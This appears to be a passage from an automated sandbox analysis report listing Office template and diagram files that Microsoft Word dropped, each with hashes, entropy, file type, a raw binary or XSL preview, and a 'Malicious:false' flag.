                                                                                                                            SHA-256:223EA2602C3E95840232CACC30F63AA5B050FA360543C904F04575253034E6D7
                                                                                                                            SHA-512:BDF3A8E3D6EE87D8ADE0767918603B8D238CAE8A2DD0C0F0BF007E89E057C7D1604EB3CCAF0E1BA54419C045FC6380ECBDD070F1BB235C44865F1863A8FA7EEA
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........2..<..]#.....'......diagrams/layout1.xml.].r.8...V.;0.;..aO........{.....V..3].d{..............\. .#.t... ........x<...@7o.]..7.N..@.NF..../....S.../.xC..U...<..Q.=...|..v.....cQ..Y=.....i`.. ..?.;...Go....x.O.$....7s..0..qg....|..r..l.w.a..p.3.Em7v...N............3..7...N.\\..f...9...U$..7...k.C..M.@\.s....G/..?...I...t.Yos...p..z...6.lnqi.6..<..1qg+......#]....|C/N..K\}.....#..".
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):9191
                                                                                                                            Entropy (8bit):7.93263830735235
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:oeAMExvPJMg+yE+AfJLi3+Xoj7F3sPgMG61J88eDhFWT7hFNsdJtnLYJ7tSh:v2d+hnfJLi3+4ja4WqhFWT7FsdHMA
                                                                                                                            MD5:08D3A25DD65E5E0D36ADC602AE68C77D
                                                                                                                            SHA1:F23B6DDB3DA0015B1D8877796F7001CABA25EA64
                                                                                                                            SHA-256:58B45B9DBA959F40294DA2A54270F145644E810290F71260B90F0A3A9FCDEBC1
                                                                                                                            SHA-512:77D24C272D67946A3413D0BEA700A7519B4981D3B4D8486A655305546CE6133456321EE94FD71008CBFD678433EA1C834CFC147179B31899A77D755008FCE489
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK.........]w>....<...5.......diagrams/layout1.xmlz........].r.F.}......1w`.J..'.......w..Dn. d....~........pw...O.......s...?...p7.t>e.r<.]u.e..d..|8..\uo.......K...._.Y..E6.|..y;........y.*/:o./...:[.o.+/.....?.....Z.?..s..d}...S.`...b.^o9.e.ty9_d...y>M.....7...e....."....<.v.u...e:].N.t....a....0..}..bQ.Y..>.~..~...U.|..Ev.....N...bw....{...O..Y.Y.&........A.8Ik...N.Z.P.[}t........|m...E..v..,..6........_?..."..K<.=x....$..%@.e..%....$=F..G..e........<F..G51..;......=...e.e.q..d......A...&9'.N.\%.=N.Z.9.s......y.4.Q.c......|8.......Eg.:.ky.z.h.......).O...mz...N.wy.m...yv....~8.?Lg..o.l.y:.....z.i..j.irxI.w...r.......|.=....s};.\u.{t;i~S.......U7..mw...<.vO...M.o...W.U.....}.`V<|..%....l..`>]..".].I.i.N..Z..~Lt.........}?..E~:..>$......x...%.........N....'C.m.=...w.=.Y...+'M.].2 >.]_~...'.?...:....z.O..Y......6..5...sj?.....).B..>.3...G...p.9.K!..[H..1$v../...E V..?`....+[...C......h..!.QI5....<.>...A.d.......
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):4326
                                                                                                                            Entropy (8bit):7.821066198539098
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:+fF+Jrp7Yo5hnJiGa24TxEcpUeONo1w2NFocy2LQi33Z:2+f7YuhJdJ4TxEcmKwGkk3Z
                                                                                                                            MD5:D32E93F7782B21785424AE2BEA62B387
                                                                                                                            SHA1:1D5589155C319E28383BC01ED722D4C2A05EF593
                                                                                                                            SHA-256:2DC7E71759D84EF8BB23F11981E2C2044626FEA659383E4B9922FE5891F5F478
                                                                                                                            SHA-512:5B07D6764A6616A7EF25B81AB4BD4601ECEC1078727BFEAB4A780032AD31B1B26C7A2306E0DBB5B39FC6E03A3FC18AD67C170EA9790E82D8A6CEAB8E7F564447
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK.........n.A...#............docProps/thumbnail.jpgz.........{4.i....1.n.v)..#.\*....A+..Q(."..D.......#Q)...SQ....2c.ei.JC...N.{......}.s.s..y>....d.(:.;.....q........$.OBaPbI..(.V...o.....'..b..edE.J.+.....".tq..dqX.......8...CA.@..........0.G.O.$Ph...%i.Q.CQ.>.%!j..F..."?@.1J.Lm$..`..*oO...}..6......(%....^CO..p......-,.....w8..t.k.#....d..'...O...8....s1....z.r...rr...,(.)...*.]Q]S.{X.SC{GgWw..O....X./FF9._&..L.....[z..^..*....C...qI.f... .Hq....d*.d..9.N{{.N.6..6)..n<...iU]3.._.....%./.?......(H4<.....}..%..Z..s...C@.d>.v...e.'WGW.....J..:....`....n..6.....]W~/.JX.Qf..^...}...._Sg.-.p..a..C_:..F..E.....k.H..........-Bl$._5...B.w2e...2...c2/y3.U...7.8[.S}H..r/..^...g...|...l..\M..8p$]..poX-/.2}..}z\.|.d<T.....1....2...{P...+Y...T...!............p..c.....D..o..%.d.f.~.;.;=4.J..]1"("`......d.0.....L.f0.l..r8..M....m,.p..Y.f....\2.q. ...d9q....P...K..o!..#o...=.........{.p..l.n...........&..o...!J..|)..q4.Z.b..PP....U.K..|.i.$v
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):7370
                                                                                                                            Entropy (8bit):7.9204386289679745
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:fYa+ngK2xG6HvLvoUnXxO+blKO1lt2Zg0AV:fYVn8Y6Hv3XxO+8uQZCV
                                                                                                                            MD5:586CEBC1FAC6962F9E36388E5549FFE9
                                                                                                                            SHA1:D1EF3BF2443AE75A78E9FDE8DD02C5B3E46F5F2E
                                                                                                                            SHA-256:1595C0C027B12FE4C2B506B907C795D14813BBF64A2F3F6F5D71912D7E57BC40
                                                                                                                            SHA-512:68DEAE9C59EA98BD597AE67A17F3029BC7EA2F801AC775CF7DECA292069061EA49C9DF5776CB5160B2C24576249DAF817FA463196A04189873CF16EFC4BEDC62
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK........;nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........HnB;..I)....j......._rels/.rels...J.@.._e..&6E.i/.,x..Lw'.j........G..\...................)...Y.3)..`...9r{v!......z...#>5.g.WJ%..T..>'m ..K.T.....j6[(:f.)S....C.mk5^.=:...X......C.... I......&5..e..H.1...).P.cw.kjT......C.......=.....}G!7E.y$.(...}b.........b=.<..^.....U..Y..PK.........^5a.2u............diagrams/layout1.xml..ko.8..+x.t.l..J.n.t.Mnw.x. ....B.t$.,.(&i.....(..d.mY......g.../[.<!.{ap>...L...p....G.9z?...._...e..`..%......8....G!..B8.....o...b.......Q.>|.......g..O\B...i.h...0B.}.....z...k...H..t~r.v........7o.E....$....Z.........ZDd..~......>......O.3.SI.Y.".O&I....#."._c.$.r..z.g0`...0...q:...^0.EF...%(.Ao$.#.o6..c'....$%.}
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):5596
                                                                                                                            Entropy (8bit):7.875182123405584
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:dGa2unnLYEB2EUAPOak380NQjqbHaPKJebgrEVws8Vw+BMa0EbdLVQaZJgDZh0pJ:UJunLYEB2EUAxk3pIYaScgYwsV4bdS0X
                                                                                                                            MD5:CDC1493350011DB9892100E94D5592FE
                                                                                                                            SHA1:684B444ADE2A8DBE760B54C08F2D28F2D71AD0FA
                                                                                                                            SHA-256:F637A67799B492FEFFB65632FED7815226396B4102A7ED790E0D9BB4936E1548
                                                                                                                            SHA-512:3699066A4E8A041079F12E88AB2E7F485E968619CB79175267842846A3AD64AA8E7778CBACDF1117854A7FDCFB46C8025A62F147C81074823778C6B4DC930F12
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK.........V.<.S.....Y.......diagrams/layout1.xml.\.r.8...U....m.$.."3.....;...../3.XAn..O.?....V.;...")Nr.O.H....O......_..E..S...L7....8H.y<=............~...Ic......v9.X.%.\.^.,?g.v.?%w...f.).9.........Ld;.1..?~.%QQ...h.8;.gy..c4..]..0Ii.K&.[.9.......E4B.a..?e.B..4....E.......Y.?_&!.....i~..{.W..b....L.?..L..@.F....c.H..^..i...(d.......w...9..9,........q..%[..]K}.u.k..V.%.Y.....W.y..;e4[V..u.!T...).%.
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):3683
                                                                                                                            Entropy (8bit):7.772039166640107
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:GyfQZd6ZHNCWl9aXFkZwIq/QDsRYPf8P9QtDIs5r:G6wYtNZS1k99AmPfSOtD5r
                                                                                                                            MD5:E8308DA3D46D0BC30857243E1B7D330D
                                                                                                                            SHA1:C7F8E54A63EB254C194A23137F269185E07F9D10
                                                                                                                            SHA-256:6534D4D7EF31B967DD0A20AFFF092F8B93D3C0EFCBF19D06833F223A65C6E7C4
                                                                                                                            SHA-512:88AB7263B7A8D7DDE1225AE588842E07DF3CE7A07CBD937B7E26DA7DA7CFED23F9C12730D9EF4BC1ACF26506A2A96E07875A1A40C2AD55AD1791371EE674A09B
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK.........a9;lq.ri...#.......diagrams/layout1.xmlz........WKn.0.];.`..J..AP...4E..!..hi$..I......z..D.d;...m.d...f.3o.._....9'.P.I1.F.C...d.D:.........Q..Z..5$..BO...e..(.9..2..+.Tsjp.. Vt.f.<...gA.h...8...>..p4..T...9.c...'.G.;.@.;xKE.A.uX.....1Q...>...B...!T.%.* ...0.....&......(.R.u..BW.yF.Grs...)..$..p^.s.c._..F4.*. .<%.BD..E....x... ..@...v.7f.Y......N.|.qW'..m..........im.?.64w..h...UI...J....;.0..[....G..\...?:.7.0.fGK.C.o^....j4............p...w:...V....cR..i...I...J=...%. &..#..[M....YG...u...I)F.l>.j.....f..6.....2.]..$7.....Fr..o.0...l&..6U...M..........%..47.a.[..s........[..r....Q./}.-.(.\..#. ..y`...a2..*....UA.$K.nQ:e!bB.H.-Q-a.$La.%.Z!...6L...@...j.5.....b..S.\c..u...R..dXWS.R.8"....o[..V...s0W..8:...U.#5..hK....ge.Q0$>...k.<...YA.g..o5...3.....~re.....>....:..$.~........pu ._Q..|Z...r...E.X......U....f)s^.?...%......459..XtL:M.).....x..n9..h...c...PK........Ho9<"..%...........diagrams/layoutHeader1.xmlMP.N.0.>oOa.
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):4888
                                                                                                                            Entropy (8bit):7.8636569313247335
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:StrFZ23/juILHPzms5UTuK9CuZGEoEuZ28H1HiGa2RnnLY+tUb:SPZQ7uCHPzms5UTlqauZVHdJRnLY+tUb
                                                                                                                            MD5:0A4CA91036DC4F3CD8B6DBF18094CF25
                                                                                                                            SHA1:6C7EED2530CD0032E9EEAB589AFBC296D106FBB9
                                                                                                                            SHA-256:E5A56CCB3B3898F76ABF909209BFAB401B5DDCD88289AD43CE96B02989747E50
                                                                                                                            SHA-512:7C69426F2250E8C84368E8056613C22977630A4B3F5B817FB5EA69081CE2A3CA6E5F93DF769264253D5411419AF73467A27F0BB61291CCDE67D931BD0689CB66
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK.........e.>.......]>......diagrams/layout1.xmlz........Z..6....;..{......lw.E.o....i..T....&...G.+...$..(.6..>Y.pf8C.|3.?..m....xA8v.`.hW..@..Zn..(kb..(.......`.+....Y`...\..qh.0.!&w..)|...<..]Q.. _....m..Z.{3..~..5..R..d..A.O....gU.M..0..#...;.>$...T......T..z.Z.\a.+...?#.~.....1.>?...*..DD.1...'..,..(...5B...M..]..>.C..<[....,L.p..Q.v.v^q.Y...5.~^c..5........3.j.......BgJ.nv.. ............tt......Q..p..K....(M.(]@..E..~z.~...8...49.t.Q..Q.n..+.....*J.#J.... .P...P.1...!.#&...?A..&.."..|..D.I...:.....~/.....b..].........nI7.IC.a..%...9.....4...r....b..q....@o........O...y...d@+~.<.\....f.a`:...Qy/^..P....[....@i.I.._.?.X.x.8....)..s....I.0...|.....t...;...q=k.=..N.%!.(.1....B.Ps/."...#.%..&...j<..2x.=<.......s.....h..?..]?Y?...C.}E.O........{..6.d....I...A.....JN..w+....2..m>9.T7...t.6.}.i..f.Ga..t.].->...8U......G.D`......p..f.. ...qT.YX.t.F..X.u=.3r...4....4Q.D..l.6.+PR...+..T..h: H.&.1~....n.....)........2J.. O.W+vd..f....0.....6..9QhV..
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):6448
                                                                                                                            Entropy (8bit):7.897260397307811
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:tgaoRbo1sMjb0NiJ85oPtqcS+yaXWoa8XBzdJYnLYFtWT7:LR1sk+i4o1qc1yaukzd8MK
                                                                                                                            MD5:42A840DC06727E42D42C352703EC72AA
                                                                                                                            SHA1:21AAAF517AFB76BF1AF4E06134786B1716241D29
                                                                                                                            SHA-256:02CCE7D526F844F70093AC41731D1A1E9B040905DCBA63BA8BFFC0DBD4D3A7A7
                                                                                                                            SHA-512:8886BFD240D070237317352DEB3D46C6B07E392EBD57730B1DED016BD8740E75B9965F7A3FCD43796864F32AAE0BE911AB1A670E9CCC70E0774F64B1BDA93488
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK.........k.>........'......diagrams/layout1.xmlz........].r.8.}.V.?p.n....g*5..JUn.....(SU......T.l.......X.d."m."..S....F..P.........-..<Y^..=..e.L....m>.pG.....M~...+\....u}o...".Yn}Y.".-r......0...'/........{........F.~.M8.d....(.....q.D.....4\.;.D,.\.)n.S....Z.cl.|<..7._.dk..7..E.......kS...d.....i.....noX...o.W#9..}.^..I0....G.......+.K.[i.O.|G..8=.;.8.8.8.8.....{..-..^.y..[.....`...0..f...Q<^~..*.l....{...pA.z.$.$R.../...E.(..Q.(V.E_ ......X]Q..Y9.......>...8......l..--.ug.......I.;..].u.b.3Lv:.d.%H..l<...V...$.M..A>...^M./.[..I....o~,.U. .$d\..?........O.;..^M..O...A.$Yx..|f.n...H.=.|!cG)dd%..(... ..Xe......2B."i...n....P.R..E?... Y.I6...7n..Xs..J..K..'..JaU..d..|.(y.a.....d......D.Dr...._.._..m..Yu..6.o.\......&.m....wy...4k?..~........f....0.. \...}iS.i..R....q-#_..g........{Z.u.V.r(....j.I...,R..f.=.n.[.'..L'd.n C.0.I.....RpaV........c.k..NR....)B^k...d.i...d0.E. ^..G.']....x.c.>'..p...y.ny.P.x6..%.J\.....De.B\.
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):5630
                                                                                                                            Entropy (8bit):7.87271654296772
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:n5ni6jKZWsD+QJaUQ7R6qYFF5QS+BEgeJam6S7ZCHuKViGa2CnnLYLt/ht:nccqxIBdQ1QS+uDJanS7ZCHHVdJCnLY5
                                                                                                                            MD5:2F8998AA9CF348F1D6DE16EAB2D92070
                                                                                                                            SHA1:85B13499937B4A584BEA0BFE60475FD4C73391B6
                                                                                                                            SHA-256:8A216D16DEC44E02B9AB9BBADF8A11F97210D8B73277B22562A502550658E580
                                                                                                                            SHA-512:F10F7772985EDDA442B9558127F1959FF0A9909C7B7470E62D74948428BFFF7E278739209E8626AE5917FF728AFB8619AE137BEE2A6A4F40662122208A41ABB2
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK...........<..W8...j.......diagrams/layout1.xmlz........]......Hy..{...n .l.:.D.vvW..s....-a..fg&.}.\..+......4M..'=...(._.U]U......_.....U...k}.y.,......C..._^.......w/."7....v..Ea........Q..u..D{..{v.x.]....AtB15u..o...w..o.1...f.L...I<[zk7..7^..,.h.&l3...#..)..'H..d.r.#w=b...Ocw.y.&.v..t.>.s..m^M7..8I?o7................H...b....Qv.;'..%.f..#vR....V.H.),g..`...)(..m...[l...b...,.....U...Q.{.y.y.....G.I.tT.n..N.....A.tR..tr....i.<.......,.n:.#.A..a!X.......DK..;v..._M..lSc../n...v.....}.....I.|8.!b.C..v..|.....4l..n.;<9.i./..}!&2.c/.r...>.X02[..|.a.-.....$#-....>...{.M].>3.,\o.x....X%;.F.k.)*".I8<.0..#......?.h..-..O.2.B.s..v....{Abd...h0....H..I.. ...%...$1.Fyd..Y....U...S.Y.#.V.....TH(....%..nk.3Y.e.m.-.S..Q...j.Ai..E..v......4.t.|..&"...{..4.!.h.....C.P.....W...d[.....U<Yb;B.+W.!.@B....!.=......b"...Y.N;.#..Q...0G.lW...]7:...#9!z......|f..r..x.....t........`.uL1u.:.....U.D.n.<Q.[%...ngC./..|...!..q;;.w.".D..lt.".l.4".mt...E..mt
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):6193
                                                                                                                            Entropy (8bit):7.855499268199703
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:WavHMKgnU2HUGFhUnkbOKoztj1QfcnLYut3d8:YKeUlGXUnC+HQSMp
                                                                                                                            MD5:031C246FFE0E2B623BBBD231E414E0D2
                                                                                                                            SHA1:A57CA6134779D54691A4EFD344BC6948E253E0BA
                                                                                                                            SHA-256:2D76C8D1D59EDB40D1FBBC6406A06577400582D1659A544269500479B6753CF7
                                                                                                                            SHA-512:6A784C28E12C3740300883A0E690F560072A3EA8199977CBD7F260A21E8346B82BA8A4F78394D3BB53FA2E98564B764C2D0232C40B25FB6085C36D20D70A39D1
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK........X..<..Zn|...........diagrams/layout1.xmlz........]..H.}......M,l#g.j:.G-eu.*S=.$......T_6..I...6...d.NJ....r.p.p.........|.z.K.M..L.T.(........<..ks.......o...t}...P..*.7...`.+.[...H..._..X.u.....N....n....n|..=.....K.:.G7.u....."g.n.h...O.,...c...f.b.P......>[l.....j.*.?..mxk..n..|A...,\o..j..wQ.....lw.~].Lh..{3Y..D..5.Y..n..Mh.r..J....6*.<.kO...Alv.._.qdKQ.5...-FMN......;.~..._..pv..&...%"Nz].n............vM.`..k..a.:.f]...a........y.....g0..`........|V...Yq.....#...8....n..i7w<2Rp...R.@.]..%.b%..~...a..<.j...&....?...Qp..Ow|&4>...d.O.|.|...Fk;t.P[A..i.6K.~...Y.N..9......~<Q..f...i.....6..U...l. ..E..4$Lw..p..Y%NR..;...B|B.U...\e......S...=...B{A.]..*....5Q.....FI..w....q.s{.K....(.]...HJ9........(.....[U|.....d71.Vv.....a.8...L.....k;1%.T.@+..uv.~v.]`.V....Z.....`.M.@..Z|.r........./C..Z.n0.....@.YQ.8..q.h.....c.%...p..<..zl.c..FS.D..fY..z..=O..%L..MU..c.:.~.....F]c......5.=.8.r...0....Y.\o.o....U.~n...`...Wk..2b......I~
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):3075
                                                                                                                            Entropy (8bit):7.716021191059687
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:48:96yn4sOBoygpySCCxwKsZCB2oLEIK+aQpUNLRQWtmMamIZxAwCC2QnyODhVOzP4:l0vCxJsZQ2ofpKvtmMdIZxAwJyODhVOE
                                                                                                                            MD5:67766FF48AF205B771B53AA2FA82B4F4
                                                                                                                            SHA1:0964F8B9DC737E954E16984A585BDC37CE143D84
                                                                                                                            SHA-256:160D05B4CB42E1200B859A2DE00770A5C9EBC736B70034AFC832A475372A1667
                                                                                                                            SHA-512:AC28B0B4A9178E9B424E5893870913D80F4EE03D595F587AA1D3ACC68194153BAFC29436ADFD6EA8992F0B00D17A43CFB42C529829090AF32C3BE591BD41776D
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK.........nB;O.......k......._rels/.rels...J.@.._e..4...i/.,x..Lw'....v'.<....WpQ..,......7?....u.y..;bL../..3t.+.t.G....Y.v8.eG.MH,....(\..d..R....t>Z.<F-..G.(..\.x...l?..M..:#........2.#.[..H7..#g{...._j...(.....q......;.5'..Nt..."...A.h........>....\.'...L..D..DU<.....C.TKu.5Tu....bV..;PK.........C26.b..............diagrams/layout1.xml.T.n. .}N....).je./m.+u....`{..0P......p..U}c.9g..3....=h.(.."..D-.&....~.....y..I...(r.aJ.Y..e..;.YH...P.{b......hz.-..>k.i5..z>.l...f...c..Y...7.ND...=.%..1...Y.-.o.=)(1g.{.".E.>2.=...]Y..r0.Q...e.E.QKal,.....{f...r..9-.mH..C..\.w....c.4.JUbx.p Q...R......_...G.F...uPR...|um.+g..?..C..gT...7.0.8l$.*.=qx.......-8..8.
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):5151
                                                                                                                            Entropy (8bit):7.859615916913808
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:WkV3UHhcZDEteEJqeSGzpG43GUR8m8b6dDLiCTfjKPnD6H5RhfuDKNtxx3+7tDLp:Wq3UBc9EJqIpGgD5dDL1DjKvDKhfnNti
                                                                                                                            MD5:6C24ED9C7C868DB0D55492BB126EAFF8
                                                                                                                            SHA1:C6D96D4D298573B70CF5C714151CF87532535888
                                                                                                                            SHA-256:48AF17267AD75C142EFA7AB7525CA48FAB579592339FB93E92C4C4DA577D4C9F
                                                                                                                            SHA-512:A3E9DC48C04DC8571289F57AE790CA4E6934FBEA4FDDC20CB780F7EA469FE1FC1D480A1DBB04D15301EF061DA5700FF0A793EB67D2811C525FEF618B997BCABD
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........5nB;.ndX....`......._rels/.rels...J.1.._%..f.J.J..x..AJ.2M&......g..#............|.c..x{_._..^0e.|.gU..z.....#.._..[..JG.m.....(...e..r."....P)....3..M].E:..SO.;D..c..J..rt...c.,.....a.;.....$.../5..D.Ue.g...Q3......5.':...@...~t{.v..QA>.P.R.A~..^AR.S4G......].n...x41....PK.........^5..s.V....Z......diagrams/layout1.xml.[]o.F.}N~..S.......VU.U+m6R........&.d.}...{M....Q.S....p9.'./O..z."..t>q....."[..j>y..?...u....[.}..j-...?Y..Bdy.I./.....0.._.....-.s...rj...I..=..<..9.|>YK.....o.|.my.F.LlB..be/E.Y!.$6r.f/.p%.......U....e..W.R..fK....`+?.rwX.[.b..|..O>o.|.....>1.......trN`7g..Oi.@5..^...]4.r...-y...T.h...[.j1..v....G..........nS..m..E"L...s
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):333258
                                                                                                                            Entropy (8bit):4.654450340871081
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:ybW83Zb181+MKHZR5D7H3hgtfL/8mIDbEhPv9FHSVsioWUyGYmwxAw+GIfnUNv5J:i
                                                                                                                            MD5:5632C4A81D2193986ACD29EADF1A2177
                                                                                                                            SHA1:E8FF4FDFEB0002786FCE1CF8F3D25F8E9631E346
                                                                                                                            SHA-256:06DE709513D7976690B3DD8F5FDF1E59CF456A2DFBA952B97EACC72FE47B238B
                                                                                                                            SHA-512:676CE1957A374E0F36634AA9CFFBCFB1E1BEFE1B31EE876483B10763EA9B2D703F2F3782B642A5D7D0945C5149B572751EBD9ABB47982864834EF61E3427C796
                                                                                                                            Malicious:false
                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.. <xsl:output method="html" encoding="us-ascii"/>.... <xsl:template match="*" mode="outputHtml2">.. <xsl:apply-templates mode="outputHtml"/>.. </xsl:template>.... <xsl:template name="StringFormatDot">.. <xsl:param name="format" />.. <xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.. <xsl:when test="$format = ''"></xsl:when>.. <xsl:when test="substring($format, 1, 2) = '%%'">.. <xsl:text>%</xsl:text>.. <xsl:call-template name="StringFormatDot">.. <xsl:with-param name="format" select="substring($format, 3)" />.. <xsl:with-param name=
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):296658
                                                                                                                            Entropy (8bit):5.000002997029767
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:RwprAMk0qvtfL/vF/bkWPz9yv7EOMBPitjASjTQQr7IwR0TnyDkJb78plJwf33iV:M
                                                                                                                            MD5:9AC6DE7B629A4A802A41F93DB2C49747
                                                                                                                            SHA1:3D6E929AA1330C869D83F2BF8EBEBACD197FB367
                                                                                                                            SHA-256:52984BC716569120D57C8E6A360376E9934F00CF31447F5892514DDCCF546293
                                                                                                                            SHA-512:5736F14569E0341AFB5576C94B0A7F87E42499CEC5927AAC83BB5A1F77B279C00AEA86B5F341E4215076D800F085D831F34E4425AD9CFD52C7AE4282864B1E73
                                                                                                                            Malicious:false
                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
